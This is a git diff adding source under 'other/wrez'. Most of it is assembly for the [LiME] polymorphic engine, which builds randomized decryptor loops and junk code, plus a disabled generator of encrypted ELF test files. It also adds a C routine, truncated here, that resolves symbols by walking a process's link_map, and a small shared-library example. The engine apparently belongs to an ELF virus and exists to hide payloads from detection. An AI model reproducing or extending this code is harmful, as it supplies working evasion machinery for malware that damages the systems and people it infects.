+        xor byte [edi-05h],11000000b

+        sub edi,byte 03h

+lmpd_a1:

+        call lime_rnd

+        stosd

+        cmp bl,83h

+        jnz lmpd_a2

+        sub edi,byte 03h

+lmpd_a2:

+    

+        loop mk_next_prefix_decrypt

+        

+        call lime_make_tsh_cod

+        push dword [ebp-@+ret_addr]

+        ret

+        

+; ---------------------------------------------------------------

+

+lime_make_decrypt:

+        push ecx

+        call lime_make_tsh_cod

+        call lime_set_disp_reg

+

+        ; XXXwrez

+;       mov al,0cch

+;       stosb                                   ; *test*

+        

+        call lime_make_mov_cod

+        call lime_save_edi      ; a0 = disp value

+        stosd

+        

+        call lime_make_tsh_cod

+        call lime_rnd

+        and al,11111001b

+        mov [ebp-@+enc_type],al

+        mov bl,al

+        rol al,1

+        mov ah,al

+        call lime_rnd_reg

+        mov [ebp-@+key_reg],al

+        shl ah,3

+        or al,ah

+        or al,0b0h              ; mov reg,key

+        stosb

+        call lime_rnd

+        mov [esi+4*6],eax               ; a7 = key

+        stosd

+        test bl,10000000b

+        jnz lmd_a1

+        sub edi,byte 03h

+lmd_a1:

+        call lime_rnd

+        and al,00000010b

+        mov [ebp-@+para_eax],al

+        call lime_make_xchg_cod_rnd

+        

+        call lime_save_edi      ; a1 = address of loop

+        call lime_make_tsh_cod

+        

+        mov al,[ebp-@+disp_reg]

+        mov [ebp-@+orig_reg],al

+        

+        push esi

+        lea esi,[ebp-@+lime_enc_opcod_tab]

+        mov al,22

+        call lime_rnd_esi

+        add esi,eax

+        cmp eax,byte 16*2

+        pushf

+        lodsd

+        test bl,10000000b

+        jz lmd_a2

+        or eax,00010001h

+lmd_a2:

+        popf

+        push eax

+        jbe mk_no_cf

+        mov al,bl

+;       and al,01h

+        or al,0f8h              ; clc / stc

+        stosb

+        call lime_make_noflags_cod

+mk_no_cf:

+        pop eax

+        pop esi

+        mov bh,bl

+        and bh,01000000b

+        sub ah,bh

+        mov [esi],eax                   ; a2 = decryptic type

+        add esi,byte 04h

+        or ah,[ebp-@+disp_reg]

+        cmp al,40h

+        jae lmd_a3

+        mov dh,[ebp-@+key_reg]

+        rol dh,3

+        or ah,dh

+lmd_a3:

+        stosw                   ; (add/sub/xor...) (b/w) [reg+(xxxxxx)xx],key

+        xchg edx,eax

+        call lime_rnd

+        jp lmd_a4

+        and byte [edi-01h],11111000b

+        or byte [edi-01h],00000100b

+        and al,11000000b

+        or al,00100000b

+        or al,[ebp-@+disp_reg]

+        stosb

+lmd_a4:

+        call lime_save_edi      ; a3 = address of displacement

+        call lime_rnd

+        stosd

+        test bl,01000000b

+        jz lmd_a5

+        sub edi,byte 03h

+lmd_a5:

+        cmp dl,0d0h

+        jae mk_no_val

+        cmp dl,40h

+        jb mk_no_val

+        call lime_rnd

+        and al,7fh

+        stosd

+        cmp dl,81h

+        jz lmd_a6

+        and eax,byte 7fh

+        sub edi,byte 03h

+lmd_a6:

+        mov [esi+4*3],eax               ; a7 = key

+mk_no_val:

+        

+        call lime_make_xchg_cod_rnd

+        call lime_make_inc_cod  ; (inc/dec) reg

+        call lime_make_xchg_cod_rnd

+        

+        mov ax,0f881h           ; cmp reg,xxxxxxxx

+        or ah,[ebp-@+disp_reg]

+        stosw

+        call lime_aox_eax

+        call lime_save_edi      ; a4 = address of "cmp reg,xxxxxxxx"

+        stosd

+        

+        call lime_make_noflags_cod

+        

+        test byte [ebp-@+para_eax],00000010b

+        jz mk_no_xchg

+        mov al,04h

+        call lime_rnd_eax_and_al

+        add al,87h              ; xchg orig_reg,disp_reg

+        stosb

+        mov al,[ebp-@+orig_reg]

+        mov ah,al

+        xchg [ebp-@+disp_reg],al

+        dec edi

+        cmp ah,al

+        jz mk_no_xchg

+        inc edi

+        rol ah,3

+        or al,ah

+        or al,11000000b

+        cmp byte [edi-01h],87h

+        jnz lmd_a7

+        call lime_xchg_reg

+lmd_a7:

+        stosb

+        call lime_make_noflags_cod

+mk_no_xchg:

+        and byte [ebp-@+para_eax],11111101b

+        

+        call lime_make_jz_cod   ; jxx (xxxxxx)xx

+        call lime_save_edi      ; a5 = address of "jxx xx"

+        

+        call lime_make_noflags_cod

+        

+        mov al,0e9h             ; jmp xxxxxxxx

+        stosb

+        mov eax,[esi-5*4]       ; address of loop

+        sub eax,edi

+        dec eax

+        cmp eax,byte -80h

+        jae mk_short_jmp

+        sub eax,byte 03h

+        stosd

+        jmp short mk_jmp_end

+mk_short_jmp:

+        mov byte [edi-01h],0ebh ; jmp xx

+        stosb

+mk_jmp_end:

+        

+        call lime_rnd_trash

+        call lime_save_edi      ; a6

+        

+        push esi

+        mov esi,[esi-4*2]       ; address of "jxx xx"

+        mov eax,edi

+        sub eax,esi

+        cmp byte [esi-02h],00h

+        jnz mk_jz_a

+        sub esi,byte 03h

+mk_jz_a:

+        mov [esi-01h],al

+        pop esi

+        add esi,byte 04h

+        

+        pop ecx

+        ret

+        

+; -------------------------------       

+;       ...

+;       mov reg,xxxxxxxx <---- a0

+;       ...

+;a1:    

+;       ...

+;       xor [eax+xx],key <---- a7

+;       ^^^(a2)  ^^a3

+;       ...

+;       inc eax

+;       ...

+;       cmp eax,xxxxxxxx <---- a4

+;       ...

+;       jz a6

+;a5:

+;       ...

+;       jmp a1

+;       ...

+;a6:

+; -------------------------------       

+

+; ---------------------------------------------------------------

+        

+lime_encrypt:

+        mov ecx,[ebp-@+para_edx]

+        mov esi,[ebp-@+para_ecx]

+        repz movsb

+

+        push edi

+calc_disp:

+        rol dword [ebp-@+enc_type],8

+        mov eax,0aa9090ach

+        test byte [ebp-@+enc_type],10000000b

+        jz le_a1

+        or eax,01000001h

+le_a1:

+        mov [ebp-@+enc_buff-01h],eax

+

+        lea esi,[ebp-@+adr_0]

+        imul ebx,[ebp-@+adr_ndx],byte 4*8

+        lea edx,[esi+ebx]

+        mov eax,edi

+        mov esi,edi

+        sub eax,[edx+4*6]

+        and al,11111100b

+        add eax,byte 04h

+        sub esi,eax

+        mov eax,esi

+        

+        sub eax,[ebp-@+para_ebx]

+        add eax,[ebp-@+para_ebp]

+        mov ebx,[edx+4*3]

+        mov ecx,[ebx]

+        test byte [ebp-@+enc_type],01000000b

+        jz le_a2

+        movsx ecx,cl

+le_a2:

+        sub eax,ecx

+        mov ecx,[edx+4*7]       ; decryptic value

+        

+        test byte [ebp-@+enc_type],00001000b

+        jnz le_a3

+        mov ebx,[edx]           ; address of "mov reg,xxxxxxxx"

+        mov [ebx],eax

+        add eax,edi

+        sub eax,esi

+        mov ebx,[edx+4*4]       ; address of "cmp reg,xxxxxxxx"

+        jmp short le_a4

+le_a3:

+        mov ebx,[edx+4*4]       ; address of "cmp reg,xxxxxxxx"

+        mov [ebx],eax

+        add eax,edi

+        sub eax,esi

+        mov ebx,[edx]           ; address of "mov reg,xxxxxxxx"

+le_a4:

+        mov [ebx],eax

+        

+;       jmp _test1_lime_encrypt                 ; *test*

+        mov eax,[edx+4*2]       ; decryptic type

+        shr eax,16

+        mov [ebp-@+enc_buff],ax

+        mov ebx,edi

+        mov edi,esi

+        

+        mov al,[ebp-@+enc_type]

+;       and al,1

+        or al,0f8h              ; clc / stc

+        mov [ebp-@+enc_buff-02h],al

+

+encrypt_prog:

+        db 90h

+        lodsb                   ; 0ach

+enc_buff db 90h,90h

+        stosb                   ; 0aah

+        cmp esi,ebx

+        jb encrypt_prog

+_test1_lime_encrypt:

+

+        cmp byte [ebp-@+adr_ndx],0

+        jz lime_prefix_encrypt

+        dec byte [ebp-@+adr_ndx]

+        jmp calc_disp

+

+; ---------------------------------------------------------------

+        

+lime_prefix_encrypt:

+;       jmp _test2_lime_encrypt                 ; *test*

+        movzx ecx,byte [ebp-@+pre_count]

+        mov edi,[ebp-@+pre_addr]

+lpe_next:

+        mov al,1fh

+        call lime_rnd_eax_and_al

+        add eax,[ebp-@+adr_0+4*1]       ; address of loop

+        mov ebx,eax

+        sub eax,[ebp-@+para_ebx]

+        add eax,[ebp-@+para_ebp]

+        mov esi,[edi]

+        mov edx,[esi]

+        push esi

+        add esi,byte 04h

+        test byte [esi-05h],01000000b

+        jz lpe_a1

+        movsx edx,dl

+        sub esi,byte 03h

+lpe_a1:

+        sub eax,edx

+        mov edx,[edi+04h]

+        mov [edx],eax

+        add edi,byte 08h

+        mov edx,[esi]

+        pop esi

+        mov eax,[esi-02h]

+        cmp al,83h

+        jnz lpe_a2

+        movsx edx,dl

+lpe_a2:

+        and ah,00111000b

+        jz lpe_sub

+        cmp ah,00101000b

+        jz lpe_add

+        xor [ebx],edx

+        loop lpe_next

+        jmp short lime_encrypt_end

+lpe_sub:

+        sub [ebx],edx

+        loop lpe_next

+        jmp short lime_encrypt_end

+lpe_add:

+        add [ebx],edx

+        loop lpe_next

+_test2_lime_encrypt:

+

+lime_encrypt_end:

+        pop edi

+        call lime_rnd_trash

+        ret

+

+; ---------------------------------------------------------------

+

+lime_set_disp_reg:

+        push edx

+lsdr_l:

+        mov al,111b

+        call lime_rnd_al

+        cmp al,100b

+        jz lsdr_l

+        mov dl,[ebp-@+key_reg]

+        test bl,10000000b

+        jnz lsdr_a

+        and dl,011b

+lsdr_a:

+        cmp al,dl

+        jz lsdr_l

+        cmp al,[ebp-@+disp_reg]

+        jz lsdr_l

+        mov [ebp-@+disp_reg],al

+        mov [ebp-@+temp_reg],al

+        pop edx

+        ret

+

+lime_rnd:

+        push edx

+        rdtsc

+        xor eax,[ebp-@+lime_rnd_val]

+        adc eax,edi

+        neg eax

+        sbb eax,edx

+        rcr eax,1

+        xor [ebp-@+lime_rnd_val],eax

+        pop edx

+        ret

+

+lime_rnd_eax_and_al:

+        push edx

+        movzx edx,al

+        call lime_rnd

+        and eax,edx

+        pop edx

+        ret

+

+lime_rnd_al:

+        push edx

+        mov edx,eax

+lra_l:  

+        call lime_rnd

+        cmp al,dl

+        ja lra_l

+        mov dl,al

+        xchg eax,edx

+        pop edx

+        ret

+

+lime_rnd_esi:

+        and eax,byte 07fh

+        call lime_rnd_al

+        add eax,eax

+        add esi,eax

+        ret

+

+lime_rnd_addr:

+        call lime_rnd_esi

+        movzx eax,word [esi]

+        mov esi,ebp     ; added

+        add esi,eax

+        lea esi,[esi]           ; XXXwrez

+        ret

+

+lime_save_edi:

+        mov [esi],edi

+        add esi,byte 04h

+        ret

+

+lime_rnd_reg_dd:

+        mov al,01h

+lime_rnd_reg:

+        push ecx

+        push edx

+        xchg edx,eax

+lrr_l:

+        mov al,111b

+        call lime_rnd_al

+        mov ah,al

+        test dl,01h

+        jnz lrr_w

+        and al,011b

+lrr_w:

+        cmp al,100b

+        jz lrr_l

+        cmp al,[ebp-@+disp_reg]

+        jz lrr_l

+        cmp al,[ebp-@+temp_reg]

+        jz lrr_l

+        and al,011b

+        mov cl,[ebp-@+key_reg]

+        and cl,011b

+        cmp al,cl

+        jz lrr_l

+        mov dl,ah

+        xchg eax,edx

+        pop edx

+        pop ecx

+        ret

+        

+lime_rnd_trash: 

+        push ecx

+        mov al,3

+        call lime_rnd_eax_and_al

+        or al,04h

+        xchg ecx,eax

+lrt_l:  

+        call lime_rnd

+        stosb

+        loop lrt_l

+        pop ecx

+        ret

+        

+lime_rnd_rm:

+        push edx        

+        xor edx,edx

+        mov dl,al

+        mov ah,al

+        rol ah,3

+        mov al,[edi-01h]

+        call lime_rnd_reg

+        or ah,al

+        rol ah,3

+        mov al,[edi-01h]

+        call lime_rnd_reg

+        or al,ah

+        stosb

+        cmp dl,11b

+        jz lrr_a2

+        and al,11000111b

+        push eax

+        cmp eax,edi

+        jp lrr_a1

+        or ah,00000100b

+        mov [edi-01h],ah

+        mov ah,al

+        mov al,0ffh

+        call lime_rnd_al

+        and al,11111000b

+        xor al,ah

+        stosb

+lrr_a1:

+        call lime_rnd

+        stosd

+        pop eax

+        cmp al,00000101b

+        jz lrr_a2

+        cmp dl,10b

+        je lrr_a2

+        sub edi,byte 04h

+        add edi,edx

+lrr_a2:

+        pop edx

+        ret

+        

+lime_xchg_reg:

+        push edx

+        cmp eax,edi

+        jp lxr_e

+        and al,00111111b

+        mov edx,eax

+        shr al,3

+        shl dl,3

+        or al,dl

+        or al,11000000b

+lxr_e:

+        pop edx

+        ret     

+

+lime_aox_eax:

+        cmp eax,edi

+        jp lae_e

+        test byte [edi-01h],111b

+        jnz lae_e

+        dec edi

+        mov al,[edi]

+        dec edi

+        and al,00111000b

+        or al,00000101b

+        stosb

+lae_e:

+        ret

+

+; ---------------------------------------------------------------

+

+lime_make_mov_cod:

+        push esi

+        lea esi,[ebp-@+lime_mk_mov_cod_addr]

+        mov al,02h

+        call lime_rnd_addr

+        call esi

+        pop esi

+        ret

+lime_mmc1:

+        mov al,0b8h             ; mov reg,xxxxxxxx

+        or al,[ebp-@+disp_reg]

+        stosb

+        ret

+lime_mmc2:                      ; set reg=0 / (add/or/xor) reg,xx

+        lea esi,[ebp-@+lime_zero_reg_opcod_tab]

+        mov al,03h

+        call lime_rnd_esi

+        lodsd

+        or ah,[ebp-@+disp_reg]

+        rol ah,3

+        or ah,[ebp-@+disp_reg]

+        stosw

+        call lime_make_xchg_cod_rnd

+        lea esi,[ebp-@+lime_init_reg_opcod_tab]

+        mov al,03h

+        call lime_rnd_esi

+        lodsd

+        or ah,[ebp-@+disp_reg]

+        stosw

+        call lime_aox_eax

+        ret

+lime_mmc3:

+        mov ax,0a08dh           ; lea reg,xxxxxxxx

+        or ah,[ebp-@+disp_reg]

+        rol ah,3

+        stosw

+        ret

+

+lime_make_xchg_cod_rnd:

+        cmp eax,edi

+        jp lime_mxc_e

+        or byte [ebp-@+para_eax],00000010b

+        call lime_make_tsh_cod

+        mov dl,[ebp-@+disp_reg]

+        mov al,07h

+        call lime_rnd_eax_and_al

+        test byte [ebp-@+key_reg],011b

+        jz lime_mxc_a1

+        test al,100b

+        jnz lime_mxc_a6

+lime_mxc_a1:

+        and al,011b

+        test al,01b

+        jz lime_mxc_a4

+        cmp dl,101b

+        jnz lime_mxc_a2

+        and al,01b

+lime_mxc_a2:

+        add al,8ah

+        stosb

+        call lime_set_disp_reg

+        rol al,3

+        or al,dl

+        stosb

+        cmp byte [edi-02h],8dh

+        jz lime_mxc_a3

+        or byte [edi-01h],11000000b

+lime_mxc_a3:

+        jmp short lime_mxc_e

+lime_mxc_a4:

+        add ax,1887h            ; mov ah,00011regb

+        stosb

+        or ah,[ebp-@+disp_reg]

+        rol ah,3

+        call lime_set_disp_reg

+        or al,ah

+        cmp byte [edi-01h],87h

+        jnz lime_mxc_a5

+        call lime_xchg_reg

+lime_mxc_a5:

+        stosb

+lime_mxc_e:

+        call lime_make_tsh_cod

+        ret

+lime_mxc_a6:

+        call lime_set_disp_reg

+        cmp dl,000b

+        jz lime_mxc_a7

+        mov al,90h

+        or al,dl

+        mov byte [ebp-@+disp_reg],00h

+        jmp short lime_mxc_a5

+lime_mxc_a7:

+        call lime_set_disp_reg

+        or al,90h

+        jmp short lime_mxc_a5

+

+; ---------------------------------------------------------------

+

+lime_make_inc_cod:

+        push esi

+        lea esi,[ebp-@+lime_mk_inc_cod_addr]

+        mov al,01h

+        call lime_rnd_addr

+        mov al,bl

+        and al,00001000b

+        or al,[ebp-@+disp_reg]

+        test bl,10000000b

+        jz lime_mic_t

+        lea esi,[ebp-@+lime_mic3]

+lime_mic_t:

+        call esi

+        pop esi

+        ret

+lime_mic1:

+        or al,40h               ; (inc/dec) reg

+        stosb

+        ret

+lime_mic2:

+        or al,11000000b

+        mov ah,al

+        mov al,0ffh             ; (inc/dec) reg

+        stosw

+        ret

+lime_mic3:                      ; (add/sub) reg,xx / (add/sub) reg,xx

+        mov al,81h

+        stosb

+        lea esi,[ebp-@+lime_add4_reg_opcod_tab]

+        mov al,03h

+        call lime_rnd_esi

+        add esi,eax

+        mov edx,[esi]

+        mov al,dl

+        or al,[ebp-@+disp_reg]

+        stosb

+        call lime_aox_eax

+        call lime_rnd

+        stosd

+        xchg ecx,eax

+        push edx

+        call lime_make_xchg_cod_rnd

+        pop edx

+        mov al,81h

+        stosb

+        mov al,dh

+        or al,[ebp-@+disp_reg]

+        stosb

+        call lime_aox_eax

+        cmp dh,dl

+        jnz lime_mic3_a1

+        neg ecx

+lime_mic3_a1:

+        xchg eax,edx

+        shr eax,16

+        test bl,00001000b

+        jz lime_mic3_a2

+        shr eax,8

+lime_mic3_a2:

+        movsx eax,al

+        add eax,ecx

+        stosd

+        ret

+

+; ---------------------------------------------------------------

+

+lime_make_jz_cod:

+        push esi

+        lea esi,[ebp-@+lime_mk_jxx_cod_addr]

+        mov al,01h

+        call lime_rnd_addr

+        mov al,01h

+        call lime_rnd_al

+        test bl,00001000b

+        call esi

+        pop esi

+        ret

+lime_mjc1:

+        jz lime_mjc1_a

+        mov al,0ffh

+lime_mjc1_a:

+        add al,73h              ; jz(ae/b) xx

+        stosw

+        ret

+lime_mjc2:

+        mov ah,al

+        jz lime_mjc2_a

+        mov ah,0ffh

+lime_mjc2_a:

+        add ah,83h              ; jz(ae/b) xxxxxxxx

+        mov al,0fh

+        stosw

+        xor eax,eax

+        stosd

+        ret

+

+; ---------------------------------------------------------------

+

+lime_make_noflags_cod:

+        or byte [ebp-@+para_eax],10000000b

+        call lime_make_tsh_cod

+        and byte [ebp-@+para_eax],01111111b

+        ret

+

+lime_make_tsh_cod:

+;       ret                                     ; *test*

+        push ebx

+        push ecx

+        push edx

+        push esi

+        mov al,3

+        call lime_rnd_eax_and_al

+        or eax,byte 01h

+        xchg ecx,eax

+lmtc_l:

+        lea esi,[ebp-@+lime_mk_tsh_cod_addr]

+        xor eax,eax

+        mov al,08h

+        test byte [ebp-@+para_eax],10000000b

+        jz lmtc_t1

+        mov al,03h

+lmtc_t1:

+        call lime_rnd_al

+        rol eax,1

+        add esi,eax

+        movzx eax,word [esi]

+        mov esi,ebp             ; added

+        add esi,eax

+        lea esi,[esi]           ; XXXwrez

+        call lime_rnd

+        call esi

+        mov esi,[ebp-@+jxx_addr]

+        or esi,esi

+        jz lmtc_t2

+        mov eax,edi

+        sub eax,esi

+        cmp eax,byte 02h

+        jbe lmtc_t2

+        mov [esi-01h],al

+        and dword [ebp-@+jxx_addr],byte 00h

+lmtc_t2:

+        loop lmtc_l

+        and dword [ebp-@+jxx_addr],byte 00h

+        pop esi

+        pop edx

+        pop ecx

+        pop ebx

+        ret

+

+lime_mtc1:                      ; 8087

+        and al,00000100b

+        or al,0d8h

+        stosb

+lmtc1_a1:

+        mov al,ah

+        and ah,00000111b

+        cmp ah,00000101b

+        jnz lmtc1_a2

+        and al,00111111b

+        stosb

+        mov al,7fh

+        call lime_rnd_eax_and_al

+        add eax,[ebp-@+para_ebp]

+        stosd

+        ret

+lmtc1_a2:

+        or al,11000000b

+        stosb

+        ret

+

+lime_mtc2:

+        mov al,0fh

+        call lime_rnd_al

+        or al,80h

+        cmp al,8dh              ; lea reg,[reg]

+        jz lmtc2_a

+        cmp al,8bh

+        ja lime_mtc2

+        cmp al,86h

+        jb lime_mtc2

+        stosb                   ; (xchg/mov) reg,reg

+        mov al,11b

+        call lime_rnd_rm

+        jmp short lime_mtc2

+lmtc2_a:

+        stosb

+        mov al,10b

+        call lime_rnd_al

+        call lime_rnd_rm

+        ret

+

+lime_mtc3:                      ; MMX

+        push eax

+        mov al,0fh

+        stosb

+        lea ebx,[ebp-@+lime_mmx_opcod_tab]

+        mov al,2fh

+        call lime_rnd_al

+        xlatb

+        stosb

+        pop eax

+        or al,11000000b

+        stosb

+        ret

+

+lime_mtc4:

+        and al,01h

+        mov dl,al

+        shl dl,3

+        call lime_rnd_reg

+        or al,0b0h              ; mov reg,xxxxxx(xx)

+        or al,dl

+        stosb

+        cmp al,0b8h

+        jb lmtc4_a

+        call lime_rnd

+        and eax,0bfff83ffh

+        stosd

+        ret

+lmtc4_a:

+        call lime_rnd

+        stosb

+        ret

+

+lime_mtc5:

+        and al,03h

+        or al,80h               ; (add/or/adc/sbb/and/sub/xor/cmp) reg,xx

+        stosb

+        call lime_rnd_reg

+        or al,11000000b

+        stosb

+        call lime_rnd

+        and eax,83ffbfffh

+        stosd

+        cmp byte [edi-06h],81h

+        jz lime_mtc5_a

+        sub edi,byte 03h

+lime_mtc5_a:

+;       ret

+

+lime_mtc6:

+        cmp dword [ebp-@+jxx_addr],byte 00h

+        jnz lime_mtc4

+        mov al,0fh

+        call lime_rnd_eax_and_al

+        or al,70h               ; jxx xx

+        stosw

+        mov [ebp-@+jxx_addr],edi

+        call lime_mtc5

+        ret

+

+lime_mtc7:

+        jp lime_mtc7_a

+        and al,01h

+        or al,0feh              ; (inc/dec) reg

+        stosb

+        call lime_rnd_reg

+        and ah,00001000b

+        or al,11000000b

+        or al,ah

+        stosb

+        ret

+lime_mtc7_a:

+        call lime_rnd_reg_dd

+        and ah,00001000b

+        or ah,40h               ; (inc/dec) reg

+        or al,ah

+        stosb

+        ret

+

+lime_mtc8:

+;       ret

+        call lime_rnd_reg_dd

+        mov dl,al

+        mov [ebp-@+temp_reg],al

+        or al,0b8h              ; mov reg,xxxxxxxx

+        stosb

+        call lime_rnd

+        stosd

+        push edi

+        push eax

+        call lime_make_noflags_cod

+        call lime_rnd

+        and al,08h

+        or al,40h               ; (inc/dec) reg

+        or al,[ebp-@+temp_reg]

+        stosb

+        push eax

+        call lime_make_noflags_cod

+        mov ax,0f881h           ; cmp reg,xxxxxxxx

+        or ah,[ebp-@+temp_reg]

+        stosw

+        mov al,7fh

+        call lime_rnd_eax_and_al

+        or al,10h

+        pop edx

+        test dl,08h

+        pop edx

+        jnz lime_mtc8_a1

+        add eax,edx

+        jmp short lime_mtc8_a2

+lime_mtc8_a1:

+        xchg eax,edx

+        sub eax,edx

+lime_mtc8_a2:

+        stosd

+        call lime_make_noflags_cod

+        mov al,[ebp-@+disp_reg]

+        mov [ebp-@+temp_reg],al

+        mov al,75h              ; jnz xx

+        stosw

+        cmp eax,edi

+        jp lime_mtc8_a3

+        pop eax

+        sub eax,edi

+        cmp eax,byte -80h

+        jb lime_mtc8_a4

+        mov [edi-01h],al

+        ret

+lime_mtc8_a3:

+        pop eax

+lime_mtc8_a4:   

+        push edi

+        call lime_rnd_trash

+        pop edx

+        mov eax,edi

+        sub eax,edx

+        mov [edx-01h],al

+        ret

+

+lime_mtc9:                      ; (add/or/adc/sbb/and/sub/xor/cmp) reg,reg

+        call lime_rnd

+        and al,00111011b

+        stosb

+        call lime_rnd_reg

+        or al,00011000b

+        rol al,3

+        mov ah,al

+        mov al,[edi-01h]

+        call lime_rnd_reg

+        or al,ah

+        stosb

+        ret

+

+; ---------------------------------------------------------------

+

+LIME_END:

+LIME_SIZE equ LIME_END-LIME_BEGIN

+

+; ***************************************************************

+;  [LiME] test files generator

+; ***************************************************************

+

+%if 0

+main:

+        mov eax,4

+        mov ebx,1

+        mov ecx,gen_msg

+        mov edx,gen_msg_len

+        int 80h

+

+        mov ecx,50

+gen_l1:

+        push ecx

+

+        mov eax,8

+        mov ebx,filename

+        mov ecx,000111111101b   ; 000rwxrwxrwx

+        int 80h

+        

+        push eax

+        

+        mov eax,0

+        mov ebx,host_entry

+        mov ecx,host

+        mov edx,host_len

+        mov ebp,[e_entry]

+        call LIME

+        

+        pop ebx

+        

+        mov eax,4

+        mov ecx,elf_head

+        add edx,host_entry-elf_head

+        mov [p_filsz],edx

+        mov [p_memsz],edx

+        int 80h

+        

+        mov eax,6

+        int 80h

+        

+        lea ebx,[filename+1]

+        inc byte [ebx+1]

+        cmp byte [ebx+1],'9'

+        jbe gen_l2

+        inc byte [ebx]

+        mov byte [ebx+1],'0'

+gen_l2:

+        pop ecx

+        loop gen_l1

+

+        mov eax,1

+        xor ebx,ebx

+        int 80h

+        

+gen_msg db 'Generates 50 [LiME] encrypted test files...',0dh,0ah

+gen_msg_len equ $-gen_msg

+

+host:

+        call host_reloc

+host_reloc:

+        pop ecx

+        add ecx,host_msg-host_reloc

+        mov eax,4

+        mov ebx,1

+        mov edx,host_msg_len

+        int 80h

+        mov eax,1

+        xor ebx,ebx

+        int 80h

+

+host_msg db 'This is a [LiME] test file! ...('

+filename db 't00',0

+         db ')',0dh,0ah

+host_msg_len equ $-host_msg

+host_len equ $-host

+

+elf_head:

+e_ident db 7fh,'ELF',1,1,1

+        times 9 db 0

+e_type  dw 2

+e_mach  dw 3

+e_ver   dd 1

+e_entry dd host_entry-elf_head+08049000h

+e_phoff dd 34h

+e_shoff dd 0

+e_flags dd 0

+e_elfhs dw 34h

+e_phes  dw 20h

+e_phec  dw 01h

+e_shes  dw 0

+e_shec  dw 0

+e_shsn  dw 0    

+elf_ph:

+p_type  dd 1

+p_off   dd 0

+p_vaddr dd 08049000h

+p_paddr dd 08049000h

+p_filsz dd file_len

+p_memsz dd file_len

+p_flags dd 7

+p_align dd 1000h

+        times 20h db 0

+host_entry:

+        times 1024*4 db 0

+

+file_len equ $-elf_head

+

+%endif

diff --git a/other/wrez/lime.o b/other/wrez/lime.o
new file mode 100644
index 0000000..624c789
--- /dev/null
+++ b/other/wrez/lime.o
diff --git a/other/wrez/lookup-example/shared-library-build.sh b/other/wrez/lookup-example/shared-library-build.sh
new file mode 100755
index 0000000..e9832db
--- /dev/null
+++ b/other/wrez/lookup-example/shared-library-build.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
+
+gcc -Wall -fPIC -g -ggdb -c -o shared-library.o shared-library.c
+ld -Bshareable -o libshared-library.so shared-library.o
+gcc -L`pwd` -o shared-library-use shared-library-use.c -lshared-library
+
diff --git a/other/wrez/lookup-example/shared-library-use.c b/other/wrez/lookup-example/shared-library-use.c
new file mode 100644
index 0000000..f6f30b6
--- /dev/null
+++ b/other/wrez/lookup-example/shared-library-use.c
@@ -0,0 +1,16 @@
+
+#include <stdio.h>
+#include "shared-library.h"
+
+
+int
+main (int argc, char *argv[])
+{
+        void *  cow;
+
+        printf ("before calling func\n");
+        cow = mysharedfunc (2000);
+        printf ("after calling func\n");
+}
+
+
diff --git a/other/wrez/lookup-example/shared-library.c b/other/wrez/lookup-example/shared-library.c
new file mode 100644
index 0000000..1f06409
--- /dev/null
+++ b/other/wrez/lookup-example/shared-library.c
@@ -0,0 +1,44 @@
+
+#include <stdio.h>
+#include <stdlib.h>
+
+
+int
+myshareddeepfunc (int cow);
+
+
+void *
+mysharedfunc (unsigned int size)
+{
+        void *  foo;
+
+
+        fprintf (stderr, "mysharedfunc\n");
+
+        foo = malloc (size);
+        fprintf (stderr, "  # called malloc\n");
+        
+        free (foo);
+        fprintf (stderr, "  # called free\n");
+
+        foo = malloc (10 * size);
+        fprintf (stderr, "  # called malloc\n");
+
+        free (foo);
+        fprintf (stderr, "  # called free\n");
+
+        /* example for deep call */
+        if (myshareddeepfunc (size / 2) == size)
+                return ((void *) 0);
+
+        return (foo);
+}
+
+
+int
+myshareddeepfunc (int cow)
+{
+        return (cow / 2);
+}
+
+
diff --git a/other/wrez/lookup-example/shared-library.h b/other/wrez/lookup-example/shared-library.h
new file mode 100644
index 0000000..72ee7be
--- /dev/null
+++ b/other/wrez/lookup-example/shared-library.h
@@ -0,0 +1,10 @@
+
+#ifndef SHARED_LIBRARY_H
+#define SHARED_LIBRARY_H
+
+void *
+mysharedfunc (unsigned int size);
+
+#endif
+
+
diff --git a/other/wrez/lookup-example/shared-library.o b/other/wrez/lookup-example/shared-library.o
new file mode 100644
index 0000000..b8fc17f
--- /dev/null
+++ b/other/wrez/lookup-example/shared-library.o
diff --git a/other/wrez/lookup-pm.c b/other/wrez/lookup-pm.c
new file mode 100644
index 0000000..acbc69a
--- /dev/null
+++ b/other/wrez/lookup-pm.c
@@ -0,0 +1,522 @@
+/* written by some clever unnamed person
+ * lots of fixes and changes by someone else
+ */
+
+
+#include <elf.h>
+#include "lookup-pm.h"
+
+#ifdef TESTING
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include "lookup-example/shared-library.h"
+#else
+#include "common.c"
+#endif
+
+
+#define pfc(a) (pf (a) & 0xff)
+
+
+struct link_map {
+        Elf32_Addr              l_addr;
+        char *                  l_name;
+        Elf32_Dyn *             l_ld;           /* .dynamic ptr */
+        struct link_map *       l_next;
+        struct link_map *       l_prev;
+};
+
+
+struct sym_helper {
+        Elf32_Dyn *     dynsymtab;      /* DT_SYMTAB symbol table */
+        Elf32_Dyn *     dynstrtab;      /* DT_STRTAB string table */
+        Elf32_Word *    dynhash;        /* DT_HASH hashtable */
+};
+
+
+static int strstr (peekmemfunc pf, unsigned char *s1_hay,
+        unsigned char *s2_needle);
+static inline int strmatch (peekmemfunc pf, unsigned char *s1,
+        unsigned char *s2, int s2_direct);
+static inline struct link_map *locate_link_map (peekmemfunc pf, void *mybase);
+static inline Elf32_Dyn * dynamic_address (peekmemfunc pf, void *mybase);
+static inline Elf32_Dyn * dynamic_findtype (peekmemfunc pf,
+        Elf32_Dyn *dyntab, Elf32_Sword dttype);
+static inline Elf32_Sym * symtab_findfunc (peekmemfunc pf,
+        Elf32_Sym *sym, char *name, char *strtab, Elf32_Word *hash);
+static inline unsigned long elf_hash (const char *name);
+void * symbol_resolve (peekmemfunc pf, void *mybase, char *sym_name);
+
+
+static int
+strstr (peekmemfunc pf, unsigned char *s1_hay, unsigned char *s2_needle)
+{
+        unsigned char * s1wh;
+        unsigned char * s2wn;
+
+        while (pfc (s1_hay) != 0) {
+                s1wh = s1_hay++;
+                s2wn = s2_needle;
+
+                while (pfc (s1wh++) == *s2wn++) {
+                        if (*s2wn == 0)
+                                return (0);     /* found */
+                }
+        }
+
+        return (1);     /* not found */
+}
+
+
+/* strmatch
+ *
+ * simple asciiz conform compare of strings at `s1' and `s2'. `pf' is the
+ * memory peek function that pulls the bytes from the addresses. `s1' is
